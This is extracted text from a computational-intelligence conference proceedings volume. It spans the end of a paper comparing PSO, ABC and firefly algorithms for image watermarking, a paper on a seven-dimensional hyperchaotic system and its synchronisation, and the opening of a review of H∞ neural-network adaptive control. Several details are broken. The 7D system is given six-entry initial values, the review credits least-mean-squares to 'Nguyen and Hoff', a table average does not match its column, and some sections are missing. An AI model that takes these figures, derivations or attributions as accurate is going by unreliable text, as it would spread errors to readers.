its complexity depends on the number of iterations multiplied by the square of the population size. The ABC algorithm is very simple from a computational perspective and requires very few parameters to initialize at the starting phase. It also has a high probability of finding the correct result, whereas the PSO algorithm is not guaranteed to converge to the global best-optimized result. One advantage of the ABC algorithm is its abandonment concept: if the employed bees cannot improve a solution, they abandon it and transform into scout bees. The success rate of the ABC algorithm is higher than that of the PSO algorithm. One advantage of the PSO algorithm is that it is effortless to implement and requires few parameters for the calculation. From these experiments, it is apparent that all the optimization algorithms provide the right balance between imperceptibility and robustness.
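To illustrate how such a swarm search can tune the scalar strength factor, the sketch below runs a minimal PSO on a toy fitness function; the fitness and its peak at 12 are placeholders standing in for the real PSNR/NC trade-off, not the paper's actual objective, and the inertia and acceleration constants are common textbook defaults.

```python
import random

random.seed(0)  # deterministic run for reproducibility

def fitness(sf):
    """Toy stand-in for the imperceptibility/robustness trade-off:
    peaks at an assumed ideal strength factor of 12."""
    return -(sf - 12.0) ** 2

def pso_best_sf(n_particles=20, iters=60, lo=0.0, hi=50.0,
                w=0.7, c1=1.5, c2=1.5):
    """Minimal particle swarm search for the scalar strength factor SF."""
    pos = [random.uniform(lo, hi) for _ in range(n_particles)]
    vel = [0.0] * n_particles
    pbest = pos[:]                      # each particle's best-known position
    gbest = max(pos, key=fitness)       # swarm-wide best-known position
    for _ in range(iters):
        for i in range(n_particles):
            vel[i] = (w * vel[i]
                      + c1 * random.random() * (pbest[i] - pos[i])
                      + c2 * random.random() * (gbest - pos[i]))
            pos[i] = min(max(pos[i] + vel[i], lo), hi)  # clamp to search range
            if fitness(pos[i]) > fitness(pbest[i]):
                pbest[i] = pos[i]
            if fitness(pos[i]) > fitness(gbest):
                gbest = pos[i]
    return gbest
```

In the real scheme, evaluating `fitness` would mean embedding with the candidate SF, applying attacks, and combining the resulting PSNR and NC values, which is why each of the three algorithms can converge to a different SF and hence a different result.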
Table 4 BER values of extracted watermark images using various optimization techniques after performing various attacks

S. No. | Attack type | Lena image, BER (PSO / ABC / Firefly) | Pepper image, BER (PSO / ABC / Firefly)
1 | Median filtering (3*3) | 0.0083 / 0.0183 / 0.0183 | 0.0002 / 0 / 0.0002
2 | Average filtering (3*3) | 0.0146 / 0.0276 / 0.0276 | 0.0012 / 0.0002 / 0.0005
3 | Resizing | 0.0085 / 0.0193 / 0.0193 | 0.0002 / 0.0002 / 0.0002
4 | Rotation (20°) | 0.0017 / 0.0054 / 0.0054 | 0 / 0 / 0
5 | Histogram equalization | 0.0049 / 0.0095 / 0.0095 | 0.0010 / 0.0005 / 0.0007
6 | Gaussian noise (v = 0.001) | 0.0051 / 0.0276 / 0.0237 | 0.0012 / 0.0005 / 0.0002
7 | Wiener filter (2*2) | 0.0044 / 0.0144 / 0.0144 | 0.0005 / 0 / 0
8 | Gaussian average filtering | 0.0029 / 0.0081 / 0.0081 | 0.0002 / 0 / 0
9 | Average filtering (3*3) | 0.0129 / 0.0264 / 0.0264 | 0.0012 / 0.0002 / 0.0002
10 | Salt and pepper noise (0.001) | 0.0024 / 0.0115 / 0.0100 | 0.0059 / 0.0010 / 0.0032
11 | Sharpening (0.8) | 0.0015 / 0.0042 / 0.0042 | 0 / 0 / 0
12 | Speckle noise (0.001) | 0.0022 / 0.0059 / 0.0071 | 0 / 0 / 0
Average value | | 0.0057 / 0.0148 / 0.0145 | 0.0009 / 0.0001 / 0.0004
[Figure: NC values of PSO, ABC, and firefly plotted against attacks 1-12.]
[Figure: NC value vs. attacks 1-12 for PSO, ABC, and firefly.]
[Figure: BER values of PSO, ABC, and firefly plotted against attacks 1-12.]
[Figure: BER value vs. attacks 1-12 for PSO, ABC, and firefly.]
6 Conclusion
Watermarking is a technique that helps owners retain rights over their own content available on the network. The watermark added to the cover image should not degrade the original content's quality, and it should also be robust against several image processing attacks. The proposed watermarking scheme provides the right balance between robustness and imperceptibility and provides security for the watermark. This study analyzes the performance of meta-heuristic algorithms in the watermarking field and how they can optimize the results of the watermark embedding and extraction process. Here, these algorithms are used to optimize the embedding strength factor used in the embedding process. From this study, we can conclude that the firefly algorithm converges faster than the other two algorithms, and that the ABC algorithm requires very few initialization parameters, which makes it quicker to set up than the others. The results of the three algorithms differ even though they all perform the same task, because every algorithm has its own method of finding the global optimal solution. This analysis can help researchers choose among these algorithms according to their problem domain.
The proposed scheme provides the right balance between robustness and imperceptibility by optimizing the embedding strength factor using swarm intelligence algorithms. Embedding the watermark directly into the pixel values is not robust, which is why embedding here is performed in the frequency domain of the cover image. The performance of the proposed scheme is evaluated using three parameters: PSNR, BER, and NC. The comparison of all three optimization techniques shows that the proposed methodology works well against most attacks, giving a PSNR value greater than 35 and an average NC value of 0.96 for all the algorithms. In future, work can be done to analyze other optimization algorithms, whether meta-heuristic or fuzzy-logic based.
7 Conflict of Interest
References
1. Ahmadi, S. B. B., Zhang, G., & Wei, S. (2019). Robust and hybrid SVD-based image watermarking schemes: A survey. Multimedia Tools and Applications. https://doi.org/10.1007/s11042-019-08197-6
2. Cayre, F., Fontaine, C., & Furon, T. (2005). Watermarking security: Theory and practice. IEEE
Transactions on Signal Processing, 53(10), 3976–3987.
3. Cox, I., Miller, M., Bloom, J., Fridrich, J., & Kalker, T. (2007). Digital watermarking and
steganography (pp. 61–102). San Mateo: Morgan Kaufmann.
4. Agarwal, N., Singh, A., & Singh, P. (2019). Survey of robust and imperceptible watermarking.
Multimedia Tools and Applications, 78. https://doi.org/10.1007/s11042-018-7128-5
5. Abdelhakim, A., Saleh, H., & Nassar, A. (2016). Quality metric-based fitness function for robust watermarking optimization with Bees Algorithm. IET Image Processing, 10(3), 247–252.
6. Abraham, J., & Paul, V. (2016). An imperceptible spatial domain color image watermarking
scheme. Journal of King Saud University—Computer and Information Sciences, 1–10, 31–133.
7. Garg, P., & Kishore, R. (2020). Performance comparison of various watermarking techniques.
Multimedia Tools and Applications, 79, 25921–25967.
8. Singh, A., Sharma, N., Dave, M., & Mohan, A. (2012). A novel technique for digital image
watermarking in spatial domain. In Proceedings of 2nd IEEE International Conference on
Parallel, Distributed and Grid Computing, PDGC (pp. 497–501).
9. Mathur, S., Dhingra, A., Prabukumar, M., Loganathan, A., & Muralibabu, K. (2016). An
efficient spatial domain based image watermarking using shell based pixel selection. In
International Conference on Advances in Computing, Communications and Informatics
(pp. 2696–2702). IEEE.
10. Bamatraf, A., Ibrahim, R., & Salleh, M. (2011). Digital watermarking algorithm using LSB.
In International Conference on Computer Applications and Industrial Electronics (ICCAIE)
(pp. 155–159). IEEE Xplore.
11. Patel, S., Mehta, T., & Pradhan, S. (2011). A unified technique for robust digital watermarking
of colour images using data mining and DCT. International Journal of Internet Technology
and Secured Transactions, 3, 81–96.
12. Pradhan, C., Saxena, V., & Bisoi, A. (2012). Non blind digital watermarking technique using
DCT and cross chaos map. In International conference on Communications, Devices and
Intelligent Systems (CODIS) (pp. 274–277). IEEE.
13. Li, N., Zheng, X., Zhao, Y., Wu, H., & Li, S. (2008). Robust algorithm of digital image
watermarking based on discrete wavelet transform. In International Symposium on Electronic
Commerce and Security (pp. 942–945). IEEE.
14. Maruturi, H., Bindu, H., & Swamy, K. (2016). A secure an invisible image watermarking
scheme based on wavelet transform in HSI color space. Procedia Computer Science, 93, 462–
468.
15. Hamidi, M., Haziti, M., Cherifi, H., & Mohammed, EL. H. (2018). Hybrid blind robust image
watermarking technique based on DFT-DCT and Arnold transform. Multimedia Tools and
Applications, 1–34.
16. Advith, J., Varun, K., & Manikantan, K. (2016). Novel digital image watermarking using
DWT-DFT-SVD in YCbCr color space (pp. 1–6). IEEE.
17. Hua, G., Huang, J., Shi, Y., Goh, J., & Thing, V. (2016). Twenty years of digital audio
watermarking—A comprehensive review. Signal Processing, 128, 222–242.
18. Singh, A., Dave, M., & Mohan, A. (2014). Hybrid technique for robust and imperceptible
multiple watermarking using medical images. Multimedia Tools Application, 1–21.
19. Perwej, Y., Parwej, F., & Perwej, A. (2012). An adaptive watermarking technique for the
copyright of digital images and digital image protection. International Journal of Multimedia
& Its Applications, 4(2), 21–38.
20. Aditya, K., Choudhary, A., Sing, M., & Adhikari, A. (2017). Image watermarking based on
cuckoo search with dwt using lévy flight algorithms (pp. 29–33). https://doi.org/10.1109/NET
ACT.2017.8076737.
21. Ansari, I., Pant, M., & Ahn, C. (2017). Secured and optimized robust image watermarking scheme. Arabian Journal for Science and Engineering, 43. https://doi.org/10.1007/s13369-017-2777-7
22. Ansari, I., Pant, M., Ahn, C. W. (2017). Artificial bee colony optimized robust-reversible image
watermarking. Multimedia Tools and Applications, 76.
23. Raj, S. J., Jero, E., Ramu, P., & Swaminathan, R. (2015). Imperceptibility—Robustness tradeoff
studies for ECG steganography using continuous Ant Colony optimization. Expert Systems with
Applications, 49. https://doi.org/10.1016/j.eswa.2015.12.010.
24. Ramasamy, R., & Arumugam, V. (2020). Robust image watermarking using fractional
Krawtchouk transform with optimization. Journal of Ambient Intelligence and Humanized
Computing, 1–12.
25. Abdelhakim, A., Saleh, H., & Nassar, A. (2016). A quality guaranteed robust image
watermarking optimization with Artificial Bee Colony. Expert Systems with Applications, 72.
26. Sejpal, S., & Shah, N. (2016). A novel multiple objective optimized color watermarking scheme
based on LWT-SVD domain using nature based bat algorithm and firefly. In 2016 IEEE Inter-
national Conference on Advances in Electronics, Communication and Computer Technology
(ICAECCT) (pp. 38–44).
Comparative Analysis: Role of Meta-Heuristic Algorithms … 327
27. Sisaudia, V., & Vishwakarma, V. (2020). Copyright protection using KELM-PSO based multi-
spectral image watermarking in DCT domain with local texture information based selection.
Multimedia Tools and Applications, 1–22.
28. Maloo, S., Kumar, M., & Lakshmi, N. (2020). A modified whale optimization algorithm based
digital image watermarking approach. Sensing and Imaging, 1–22.
29. Kazemivash, B., & Ebrahimi Moghaddam, M. (2017). A robust digital image watermarking technique using lifting wavelet transform and firefly algorithm. Multimedia Tools and Applications, 76.
30. Moeinaddini, E. (2019). Selecting optimal blocks for image watermarking using entropy and distinct discrete firefly algorithm. Soft Computing, 23, 1–15.
31. Karaboga, D. (2005). An idea based on Honey Bee swarm for numerical optimization
(pp. 1–10). Erciyes University, Engineering Faculty, Computer Engineering Department,
Kayseri/Türkiye, Technical report-Tr06.
32. Karaboga, D., & Basturk, B. (2007). Artificial Bee Colony (ABC) optimization algorithm for
solving constrained optimization problems. Foundations of fuzzy logic and soft computing.
In 12th International Fuzzy Systems Association World Congress, IFSA 2007 (pp. 789–798),
Cancun, Mexico 4529.
33. Karaboga, D., & Akay, B. (2009). A comparative study of artificial bee colony algorithm.
Applied Mathematics and Computation, 214(1), 108–132.
34. Kennedy, J., & Eberhart, R. (1995). Particle swarm optimization. In Proceedings of IEEE
International Conference on Neural Networks (pp. 1942–1948). Institute of Electrical and
Electronics Engineers, New York.
35. Zhou, N., Luo, A., Zou, W. P. (2018). Secure and robust watermark scheme based on multiple
transforms and particle swarm optimization algorithm. Multimedia Tools Application, 1–17.
36. Dubolia, R., Singh, R., Bhadoria, S., & Gupta, R. (2011). Digital image watermarking by using
discrete wavelet transform and discrete cosine transform and comparison based on PSNR.
In IEEE International Conference on Communication Systems and Network Technologies
(pp. 593–596).
37. Xu, H., Kang, X., Wang, Y., Wang, Y. (2018). Exploring robust and blind watermarking
approach of colour images in DWT-DCT-SVD domain for copyright protection. Inderscience
International Journal of Electronic Security and Digital Forensics, 10(1), 79–96.
38. Nguyen, P. –B., Luong, M., & Beghdadi, A. (2010). Statistical analysis of image quality metrics
for watermark transparency assessment. 6297, 685–696.
39. Lin, Y., & Abdulla, W. (2011). Objective quality measures for perceptual evaluation in digital
audio watermarking. IET Signal Processing, 5(7), 623–631.
40. Marini, E., Autrusseau, F., Le Callet, P., Campisi, P. (2007). Evaluation of standard water-
marking techniques. In Electronic Imaging, Security, Steganography, and Watermarking of
Multimedia Contents, San Jose, United States: 6505-24.
A Novel Seven-Dimensional Hyperchaotic
Abstract In this work, we construct a novel 7D hyperchaotic system with five
positive Lyapunov exponents based on state feedback control. Various significant
aspects of the new mechanism, including equilibrium points, stability, and Lyapunov
exponents, are evaluated. Computer modeling shows that complex dynamical
behaviors such as chaotic, hyperchaotic, and periodic motion are demonstrated by
the new system. The dynamic properties of the system are analyzed theoretically
and by numerical simulation on the basis of equilibrium points, stability, dissipation,
Lyapunov exponents, and phase portraits. In addition, coexisting attractors under
different initial conditions are investigated for the same parameters. Moreover,
hybrid synchronization between two similar and identical systems is achieved
through a nonlinear control strategy and Lyapunov stability theory using MATLAB.
A good agreement was obtained between the numerical and theoretical analyses of
the system dynamics based on the equilibrium points; the new hyperchaotic system
may find good applications in the fields of encryption and nonlinear circuits.
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 329
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_27
330 M. L. Thivagar et al.
were found in the literature [5, 6]. Both of those methods are defined by two positive Lyapunov exponents, and the dimension of a hyperchaotic system is linked to the
number of positive Lyapunov exponents; thus the minimum dimension for hyperchaotic
systems is four [1, 7]. A hyperchaotic system is a system with more than one
positive Lyapunov exponent, while a chaotic system is a system with only one
positive Lyapunov exponent [7, 10]. In order to increase the number of positive
Lyapunov exponents, the dimension of the system must be increased. Lately,
there has been great interest in building 5D hyperchaotic systems with three positive
Lyapunov exponents, such as the Hu system of 2009 [7] and that of Yang [8].
A hyperchaotic system of higher dimension is more effective than one of low
dimension owing to its higher unpredictability and randomness, and it performs
better than the traditional 3D, 4D, and 5D systems. Until now, the number of works
related to this subject has grown, and numerous papers on the construction of new
high-dimensional (6D) systems with four positive Lyapunov exponents have been
published [9–14]. In 2018, Yang et al. built a 6D hyperchaotic system with four
positive Lyapunov exponents, LE1 = 0.4302, LE2 = 0.2185, LE3 = 0.1294,
LE4 = 0.0775, LE5 = −0.0001, LE6 = −12.5222, consisting of 16 terms, three of
which are nonlinear, as described in [13]:
ẋ1(t) = a(x2 − x1) + x4 + r x6
ẋ2(t) = c x1 − x2 − x1 x3 + x5
ẋ3(t) = −b x3 + x1 x2                                   (1)
ẋ4(t) = d x4 − x1 x3
ẋ5(t) = −h x2 + x6
ẋ6(t) = k1 x1 + k2 x2
where (x1(t), …, x6(t))T ∈ R^6 are the real state variables of system (1) and
abdh ≠ 0; a, b, c are constant parameters, and d, h, r, k1, k2 are the control parameters.
Fig. 1 Attractors of new system: a x1 − x3 − x4 space and b x3 − x6 plane
ẋ1(t) = a(x2 − x1) + x4 + r x6 − x7
ẋ2(t) = c x1 − x2 − x1 x3 + x5
ẋ3(t) = −b x3 + x1 x2
ẋ4(t) = d x4 − x1 x3                                    (2)
ẋ5(t) = −h x2 + x6
ẋ6(t) = p x1 + q x2
ẋ7(t) = x1 x2 − k x7
where (x1(t), …, x7(t))T ∈ R^7 are the real state variables of system (2); a, b, c,
d, h, r, p, q are constant real parameters, and k is the control parameter that
determines the dynamic behavior. When a = 10, b = 8/3, c = 28, d = 2, h = 9.9, r =
1, p = 1, q = 2, and k = 12, the above system has a hyperchaotic attractor as
shown in Fig. 1. Thus, the new system consists of 19 terms, four of which are
nonlinear.
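As an illustrative numerical sketch (not from the paper; the parameter values are those quoted above, and the fixed-step RK4 integrator is our own choice), system (2) can be simulated as follows:

```python
import numpy as np

# right-hand side of system (2); parameters as quoted in the text
def rhs(x, a=10.0, b=8/3, c=28.0, d=2.0, h=9.9, r=1.0, p=1.0, q=2.0, k=12.0):
    x1, x2, x3, x4, x5, x6, x7 = x
    return np.array([
        a * (x2 - x1) + x4 + r * x6 - x7,  # x1'
        c * x1 - x2 - x1 * x3 + x5,        # x2'
        -b * x3 + x1 * x2,                 # x3'
        d * x4 - x1 * x3,                  # x4'
        -h * x2 + x6,                      # x5'
        p * x1 + q * x2,                   # x6'
        x1 * x2 - k * x7,                  # x7'
    ])

def rk4(f, x0, dt, steps):
    """Fixed-step fourth-order Runge-Kutta integration."""
    x = np.asarray(x0, dtype=float)
    traj = [x.copy()]
    for _ in range(steps):
        k1 = f(x)
        k2 = f(x + dt / 2 * k1)
        k3 = f(x + dt / 2 * k2)
        k4 = f(x + dt * k3)
        x = x + dt / 6 * (k1 + 2 * k2 + 2 * k3 + k4)
        traj.append(x.copy())
    return np.array(traj)

traj = rk4(rhs, [1, 1, 1, 1, 1, 1, 1], dt=1e-3, steps=1000)
```

Plotting, e.g., traj[:, 0] against traj[:, 2] and traj[:, 3] gives the kind of projection shown in Fig. 1a.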
Setting the right-hand side of system (2) equal to zero, the equilibrium points are
obtained by solving the following equations:
a(x2 − x1) + x4 + r x6 − x7 = 0
c x1 − x2 − x1 x3 + x5 = 0
−b x3 + x1 x2 = 0
d x4 − x1 x3 = 0                                        (3)
−h x2 + x6 = 0
p x1 + q x2 = 0
x1 x2 − k x7 = 0
Then it has only one equilibrium point O(0, 0, 0, 0, 0, 0, 0). The Jacobian matrix
of system (2) at the origin is
J(O) =
⎡ −a   a   0   1   0   r  −1 ⎤
⎢  c  −1   0   0   1   0   0 ⎥
⎢  0   0  −b   0   0   0   0 ⎥
⎢  0   0   0   d   0   0   0 ⎥
⎢  0  −h   0   0   0   1   0 ⎥
⎢  p   q   0   0   0   0   0 ⎥
⎣  0   0   0   0   0   0  −k ⎦
It is clear that some eigenvalues have positive real parts; therefore the point O is
unstable. Thus, system (2) is classified as a system with self-excited attractors
(if a system possesses only unstable equilibrium points, it is called a system with
self-excited attractors).
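This can be checked numerically; the following is a small sketch (not from the paper; the hyperchaotic parameter set quoted in Sect. 2 is assumed):

```python
import numpy as np

a, b, c, d, h, r, p, q, k = 10.0, 8/3, 28.0, 2.0, 9.9, 1.0, 1.0, 2.0, 12.0

# Jacobian of system (2) evaluated at the origin O
J = np.array([
    [ -a,    a,  0.0, 1.0, 0.0,   r, -1.0],
    [  c, -1.0,  0.0, 0.0, 1.0, 0.0,  0.0],
    [0.0,  0.0,   -b, 0.0, 0.0, 0.0,  0.0],
    [0.0,  0.0,  0.0,   d, 0.0, 0.0,  0.0],
    [0.0,   -h,  0.0, 0.0, 0.0, 1.0,  0.0],
    [  p,    q,  0.0, 0.0, 0.0, 0.0,  0.0],
    [0.0,  0.0,  0.0, 0.0, 0.0, 0.0,   -k],
])

eigs = np.linalg.eigvals(J)
unstable = (eigs.real > 0).any()  # True: O has eigenvalues in the right half-plane
```

Note that row 4 of J involves only x4, so λ = d = 2 > 0 is an exact eigenvalue, which is already enough to make O unstable.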
The numerical simulation was carried out with the Wolf algorithm and MATLAB
software. For a = 9, b = 7/3, c = 27, d = 2, h = 9, r = 1, p = 1, q = 2, k = 12, system
(2) is hyperchaotic and has five positive Lyapunov exponents.
Assume that system (2) is the drive system; it can be written as
ẋ = A1 x + B1 C1                                        (4)

where A1 is the 7 × 7 matrix of the linear part of system (2) (equal to J(O) above),
B1 is the 7 × 4 matrix whose only nonzero entries are B1(2,1) = B1(3,2) = B1(4,3) =
B1(7,4) = 1, and C1 = (−x1 x3, x1 x2, −x1 x3, x1 x2)T. The matrix A1 is the parameter
matrix of system (2), and the product B1 C1 describes the nonlinear part of
system (2). The response system is given by:
ẏ = A2 y + B2 C2 + U                                    (5)

where U = (u1, u2, …, u7)T is the nonlinear controller to be designed, A2 and B2
have the same structure as A1 and B1, and C2 = (−y1 y3, y1 y2, −y1 y3, y1 y2)T.
Theorem If the control U of system (6) is designed as follows:
u1 = 2a x2 + 2x4 − r e6 + 2r x6 − c e2 − x3 e2 − p e6
u2 = −a e1 − 2c x1 − 2x5 + 2y1 x3 − x1 e3 − q e6 − x1 e7
u3 = y1 e2 − e1 e2 + x2 e1 + 2x1 x2 + y1 e4
u4 = −2d e4 − e1 − x3 e1 + 2y1 x3                       (7)
u5 = −2h x2 + 2x6 − e5
u6 = −2p x1 − e5 − e6
u7 = e1 − e1 e2 + x2 e1 + 2x1 x2
Proof Substituting the above control into the error dynamics system (6), we get:
ė1 = a e2 − a e1 + e4 − e7 − c e2 − x3 e2 − p e6
ė2 = c e1 − e2 + e5 − y1 e3 + x3 e1 − a e1 − x1 e3 − q e6 − x1 e7
ė3 = −b e3 + x1 e2 + y1 e2 + y1 e4
ė4 = −d e4 − y1 e3 − e1                                 (8)
ė5 = −h e2 + e6 − e5
ė6 = p e1 + q e2 − e5 − e6
ė7 = −k e7 + x1 e2 + e1
Clearly, all the eigenvalues have negative real parts, and the linearization
approach establishes the hybrid synchronization (HS) between system (4) and
system (5). The Lyapunov function is constructed as

V(e) = (1/2)(e1² + e2² + e3² + e4² + e6² + e7²) + (5/99) e5²,   e = [e1, e2, e3, e4, e5, e6, e7]T,

that is, V(e) = eT P e with P = diag(0.5, 0.5, 0.5, 0.5, 5/99, 0.5, 0.5). Its derivative
along the error dynamics (8) is

V̇(e) = e1 ė1 + e2 ė2 + e3 ė3 + e4 ė4 + (10/99) e5 ė5 + e6 ė6 + e7 ė7
V̇(e) = e1 (a e2 − a e1 + e4 − e7 − c e2 − x3 e2 − p e6)
 + e2 (c e1 − e2 + e5 − y1 e3 + x3 e1 − a e1 − x1 e3 − q e6 − x1 e7)
 + e3 (−b e3 + x1 e2 + y1 e2 + y1 e4) + e4 (−d e4 − y1 e3 − e1)
 + (10/99) e5 (−h e2 + e6 − e5) + e6 (p e1 + q e2 − e5 − e6)
 + e7 (−k e7 + x1 e2 + e1)
V̇(e) = −eT Q e, where Q = diag(9, 1, 7/3, 2, 10/99, 1, 12), so Q > 0. Consequently,
V̇(e) is negative definite on R^7. The nonlinear controller is sufficient and it achieves
the HS.
Now, we take the initial values (15, 2, 0, −2, −3, 0) and
(−15, −10, −8, 6, 0, −4) to illustrate the HS between (4) and (5) numerically.
Figures 3 and 4 verify these results numerically, respectively (Figs. 5 and 6).
4 Discussion
The proposed work considers five positive Lyapunov exponents based on state
feedback control and constructs a novel 7D hyperchaotic system. Various significant
aspects of the new mechanism, including equilibrium points, stability, and Lyapunov
exponents, are evaluated. Computer modeling shows that complex dynamical
behaviors such as chaotic, hyperchaotic, and periodic motion are demonstrated by
the new system. The hybrid synchronization (HS) between two nearly identical
systems by Lyapunov stability theory for the current scheme is also reported in this
section.
Figures 1, 2, and 3 illustrate the Lyapunov exponents of the new 7D system and
the new attractor of the proposed 7D system with a = 9, b = 7/3, c = 27, d = 2, p =
1, q = 2, h = 9, r = 1, and one parameter varying. Table 1 shows whether system (2)
evolves into chaotic or hyperchaotic behavior; these results are derived from the
Wolf algorithm. With Q = diag(9, 1, 7/3, 2, 10/99, 1, 12), Q > 0; consequently, V̇(e)
is negative definite on R^7, and the nonlinear controller is sufficient to achieve the HS.
5 Conclusions
In this paper, by introducing a nonlinear feedback controller into the first equation
of the 6D Lorenz-type system, a novel seven-dimensional continuous real-variable
hyperchaotic system with five positive Lyapunov exponents was suggested. In
addition, with two analytical methods, Lyapunov's method and the linearization
method, some characteristics of dynamic behavior such as equilibrium points,
stability, and Lyapunov exponents were investigated, based on a nonlinear control
strategy. The new hyperchaotic system may find good applications in the fields of
encryption and nonlinear circuits.
References
1. Wang, W., & Guan, Z. H. (2006). Generalized synchronization of continuous chaotic system.
Chaos, Solitons & Fractals, 27(1), 97–101.
2. Al-Azzawi, S. F. (2012). Stability and bifurcation of Pan chaotic system by using Routh-Hurwitz
and Gardan method. Applied Mathematics and Computation, 219(3), 1144–1152.
3. Khalaf, O. I., Ajesh, F., Hamad, A. A., Nguyen, G. N., & Le, D. N. (2020). Efficient dual-
cooperative bait detection scheme for collaborative attackers on mobile ad-hoc networks. IEEE
Access, 8, 227962–227969.
4. AL-Azzawi, S. F., et al. (2020). Chaotic Lorenz system and it’s suppressed. Journal of Advanced
Research in Dynamical and Control Systems, 12(2), 548–555.
5. Zhang, G., et al. (2017). On the dynamics of new 4D Lorenz-type chaos systems. Advances in
Difference Equations, 2017(1).
6. Abed, K. A. (2020). Controlling of jerk chaotic system via linear feedback control strategies.
Indonesian Journal of Electrical Engineering and Computer Science, 20(1), 370–378.
7. Zhu, C. (2010). Control and synchronize a novel hyperchaotic system. Applied Mathematics
and Computation, 216(1), 276–284.
8. Thivagar, M. L., & Abdullah Hamad, A. (2020). A theoretical implementation for a proposed
hyper-complex chaotic system. Journal of Intelligent & Fuzzy Systems, 38(3), 2585–2595.
9. Thivagar, L. M., Hamad, A. A., & Ahmed, S. G. (2020). Conforming dynamics in the metric
spaces. Journal of Information Science and Engineering, 36(2), 279–291.
10. Thivagar, M. L., Ahmed, M. A., Ramesh, V., & Hamad, A. A. (2020). Impact of non-linear
electronic circuits and switch of chaotic dynamics. Periodicals of Engineering and Natural
Sciences, 7(4), 2070–2091.
11. Al-Azzawi, S. F., Thivagar, M. L., Al-Obeidi, A. S., & Hamad, A. A. (2020). Hybrid synchro-
nization for a novel class of 6D system with unstable equilibrium points. Materials Today:
Proceedings. https://doi.org/10.1016/j.matpr.2020.10.524.
12. Thivagar, M. L., & Hamad, A. A. (2019). Topological geometry analysis for complex dynamic
systems based on adaptive control method. Periodicals of Engineering and Natural Sciences,
7(3), 1345–1353.
13. Hamad, A. A., Al-Obeidi, A. S., & Al-Taiy, E. H. (2020). Synchronization phenomena inves-
tigation of a new nonlinear dynamical system 4D by Gardano’s and Lyapunov’s methods.
Computers, Materials & Continua, 66(3), 3311–3327.
14. Abed, F. N., Hamad, A. A., & Sapit, A. B. (2020). The effect analysis for the nano powder
dielectric processing of ti-6242 alloy is performed on wire cut-electric, discharge. Materials
Today Proceedings. https://doi.org/10.1016/j.matpr.2020.09.368.
A Literature Review on H∞ Neural
Network Adaptive Control
Parul Kashyap
Abstract This literature survey reviews the writing available on H∞ adaptive
control architectures that use neural networks for systems whose uncertainty has
an ambiguous structure. The architecture merges ideas from robust control
theory, for example the H∞ control structure, the small-gain theorem, and
L-stability theory, with Lyapunov stability theory and current theoretical
developments in uncertainty control, to build an adaptive design for
systems whose uncertainty satisfies a local Lipschitz bound. The strategy
enables a control designer to simplify the adaptive tuning method, band-limit the
adaptive control signal, and, in addition, handle unmatched uncertainty in a single
design framework. Robust control design limits the impact of uncertainty and
nonlinearity at the expense of diminished performance. The design framework here
is like that used in robust control, but without sacrificing performance. All of this is
accommodated while providing transient performance bounds subject to the
characteristics of two linear systems and the adaptation gain. The applicability of
neural networks in control systems, feed-forward neural networks, direct and
indirect adaptive control, and the H∞ controller are also reviewed.
1 Introduction
P. Kashyap (B)
Department of Electrical Engineering, Madan Mohan Malaviya University of Technology,
Gorakhpur, India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 341
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_28
2 Neural Networks
The history of neural networks can be traced back to the modeling of the neuron.
The first representation of a nerve cell was given by the physiologists McCulloch
and Pitts. Their modeled neuron had a single output and two types of inputs, and its
binary output was determined by summing equally weighted inputs and comparing
the sum against a threshold value.
Rosenblatt then developed the perceptron as a model able to accomplish
"learning." Rosenblatt used a trial-and-error method, interconnecting perceptrons
haphazardly and modifying their weights [9]. The model framed by McCulloch and
Pitts became the basis of the modern field of artificial neural networks [16]. The
perceptron appears to resemble a neuron, but the resemblance does not capture the
intricate electrochemical processes which in fact go on inside a nerve cell. Because
of its electrochemical nature, a nerve cell works like a voltage-to-frequency
converter: when a specific threshold is reached through the neuron's chemical
response, it fires at a higher frequency, while the magnitude of the output from the
neuron remains the same even as the input grows [14]. The perceptron is thus an
extremely simple mathematical portrayal of the neuron.
Based on minimizing the squared error and assuming an ideal response exists, a
gradient search approach was implemented. That scheme later became known as
least mean squares (LMS). Over the last several decades, LMS and related adaptive
arrays have been operated in a variety of uses, and a mathematical technique for
limiting the error was given. With the gradient search strategy, learning is no longer
a trial-and-error process. The idea of weight perturbation for the perceptron was
introduced by Selfridge [2, 3]: if performance did not improve, another random
direction vector was selected. The above is the technique referred to as climbing a
hill; conversely, when the error is driven down, it is referred to as descending a
gradient. A mathematical technique for altering the weights was created by Nguyen
and Hoff [6].
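The LMS update minimizes the instantaneous squared error by a gradient step on the weights; the following is a minimal sketch (a hypothetical three-tap example, not from the survey):

```python
import numpy as np

rng = np.random.default_rng(0)

w_true = np.array([2.0, -1.0, 0.5])  # hypothetical "ideal response" weights

w = np.zeros(3)   # adaptive weights, initialized at zero
mu = 0.05         # step size
for _ in range(5000):
    x = rng.normal(size=3)   # input sample
    d = w_true @ x           # desired response
    e = d - w @ x            # instantaneous error
    w += mu * e * x          # LMS: gradient descent on the squared error
```

With a noise-free desired response and persistently exciting inputs, the weights converge to the ideal ones.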
Back propagation revived the field. A multilayer neural network can be built and
trained by arranging perceptrons in a multilayer array. The weights, beginning with
the output-layer weights, are adjusted by back propagation. The perceptron
representation is modified for the back propagation estimation by using a
differentiable sigmoidal squashing function; the signum function was used by
perceptrons of earlier forms. The sigmoidal function is differentiable where the
signum function is not, which enables the neural network to converge toward a
neighboring minimum. Gradient information can be propagated through the
nonlinear activation stages by the back propagation algorithm, a greatly improved
model over the electrochemical-system model framed by McCulloch and Pitts. The
results reported in the field of neural networks have been generally excellent. The
golden era of network research ended around 25 years earlier, but investigation is
now being re-invigorated following the discovery of back propagation. Feed-forward
neural networks with back propagation training are in widespread use, and they will
be the foundation of the work reviewed here.
A feed-forward neural network is a network of perceptrons whose activation
function is normally sigmoidal. The back propagation algorithm modifies the
weights by minimizing the squared error [7]. The back propagation algorithm
permits differentiable activation functions so that weights can be changed across
multiple hidden layers, allowing problems that are not linearly separable to be
solved. The OR and XOR problems can be solved by including multiple nodes on
each level. From input to output the feed-forward neural network is connected so
that, on adjacent layers, every node is connected to each node. The output of an
earlier layer is the input to a node, and if the node lies on the output layer, its output
is the output of the neural network. The weights of one individual node can be
modified by altering the weights using the back propagation computation. By
